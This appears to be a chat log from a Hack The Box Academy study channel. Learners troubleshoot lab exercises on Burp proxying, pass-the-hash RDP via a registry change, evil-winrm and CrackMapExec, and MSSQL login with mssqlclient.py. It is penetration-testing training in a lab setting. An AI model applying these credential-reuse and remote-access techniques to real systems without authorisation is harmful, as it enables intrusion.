Heya, how do I get BurpSuite to intercept HTTP responses?

It's in the proxy options

it's pretty clear if you read the section

Hey, Im trying to do the live engagement in the webshell module, however the rdp session via pwnbox is very very sloooowwwwwwww. Many people have complained about the same issue on the internet - is there any way to resolve this? :/

nope

you can try changing to tcp connection or vpn region

Did you read the PtH section as I mentioned? Again, what other thing is listed in there beyond simply remoting in with the hash?

staring at the options menu, unless im blind im not seeing it >_>

i don't think he read the section at all

lol

there's a web proxies module

yes i did

no i did

then you'd see what you need to do

i'll give that a read

👍

is this going to be the same experience during cpts exam?

all about setting up burp/zap proxy (to use your own browser) and various different labs to show it off

It's right in your face under proxy options. There are several sections, one is request interception rules the other is response interception rules.

¯_(ツ)_/¯

found it, ty

see i applied the section

which i read

are you running cmd as admin

but also; you can use evil with admin and hash

no cant able to run its restricted

well the only way you can edit registry is with admin permissions

you can use evil-winrm to remote in

personally I'd just use cme and change the reg key, but i don't think that's covered in the module

yeah

but it's kinda strange as the walkthrough shows being able to do it with the htb-student user

yes

yeah i didn't use cme when i did it

same actually, I just used cme lmao

just ran it myself

worked fine

am trying too see what happens

try restarting your lab

confirmed, i was also able to do it with the low priv user

i was able to remote in as admin after the change too

It works exactly like the module says

so seems like your lab might be bugged

if restarting doesn't work; change vpn regions

awesome 👌🏻

evil-winrm taking too long

don't need to evil-winrm

can just rdp with htb-rdp; run the command

simple as that

doesn't need admin perms to edit it

did you use runas /user:Admin.. cmd

nope

i just copied/pasted the command as-is

ok

opened cmd and just ran it

Module: Attacking Common Services - Attacking SQL Databases

Enumerate the "flagDB" database and submit a flag as your answer.
I have the password for the mssqlsvc user. I'm using the following command to login like I did before with the htbdbuser account, but I'm unable to login with the mssqlsvc account.

i completed yesterday

now rdp with admin pth

you don't need to use the server name

I've tried it without the server name as well. I get the same output.

try .\\username

python3 mssqlclient.py mssqlsvc@10.129.203.12 -windows-auth use this

first go to mssqlclient.py dir

The command arguments you're using do not match up with what is taught in the module. Have you tried the command syntax from the module?

I actually did try the ones from the module initially and it failed, I found this syntax on the forums.

i dont no why its works fine now am trying from yesterday. but thanks a lot. @cloud urchin you guys

Probably not your fault, some HTB regions are having issues lately.

i think it was the region like MarcieLee said

seriously bro i tried the same steps

yup, it's been happening a lot to people

yeah

mssqlclient.py user@ip -windows-auth

This worked. Why did I have to mention -windows-auth though? Doesn't that mean it's using windows authentication and not the SQL server authentication?

^ that's why i just used sqsh in this section i think

@normal sand

yes

because you're using the user's password to auth

and the sql-server is set to use windows authentication

The user's Windows account/password*

Maybe I'm misunderstanding, I though windows auth was only for domain-joined users.

mssqlsvc is a windows service account

Some applications can use your Windows credentials for authentication

windows-auth is for local

Ahhh

as well

Also, is there a reason why I had to mention the python3 in order for it to work? I had tried the very same command earlier without python3 and it didn't work.

do you have python2.7 installed

it might be using that as your default python environment

How do I check?

if you do python -V i believe it should give version

I'm using pwnbox.

oh

i didn't have to specify python3

It said version 3.9.2

yeah

you didn't need to specify

the real resolution was using the right syntax

the using python3 is a non-issue

*made no difference

one thing i wanna ask that confusing me in this module

You're right. I just tested. I must've made a syntax mistake earlier.

So just to be clear -windows-auth is used for local accounts. When do you have to specify the server/hostname? In the section it says something about .\username that I don't quite understand.

i read this structure before and after every service attack as mentioned in the module. suppose, it is about one service like rdp. and reading of section fits this structure for every service. we can clear concepts and keep this structure in mind. So what you think it can helps us more. @cloud urchin @fathom pendant

is it only for understanding about every service attack? or something else.

for windows domain joined accounts .\ tells the system that you want to log in to a local account

this is a very broad view of attacks

tbh some things don't fit neatly into these sorts of categories/don't have every aspect of one point

got it

source: what you're using
Processes: What's taking the request
Privileges: What privileges does your access to the process give you
Destination: what do you now have access to

the reason destination loops back to source is because attacks can be recursive in nature

see for instance: privilege escalation

the source then becomes your user, the process would be whatever process handles your privesc request...

yeah i did research cleared my concepts but i want to ask how it can helps us in practical or we have to just keep in mind

it's just something to think about

hmm

enumeration is always step 0 when you get access to a user

what can you do; what can you access

thanks for your effort and time

what do you have access of that you likely shouldn't

noted

point

for instance with linux systems: what sudo perms do you have

ok

🙂

but it's not something that you have to strictly think about

it just happens

thats it i want to hear

i just confused now you make it clear

most times you only care about what you can access and what privileges you have

absolutely

the processes that handle getting what you want are mostly trivial

thanks for your great time. will meet again👍🏻

in the Network Introduction, why does it show 8 Octets in a row for one address?

ipv6?

This is one row:

Subnet mask:
1111 1111 1111 1111

1111 1111 1100 0000

=
255.255.255.192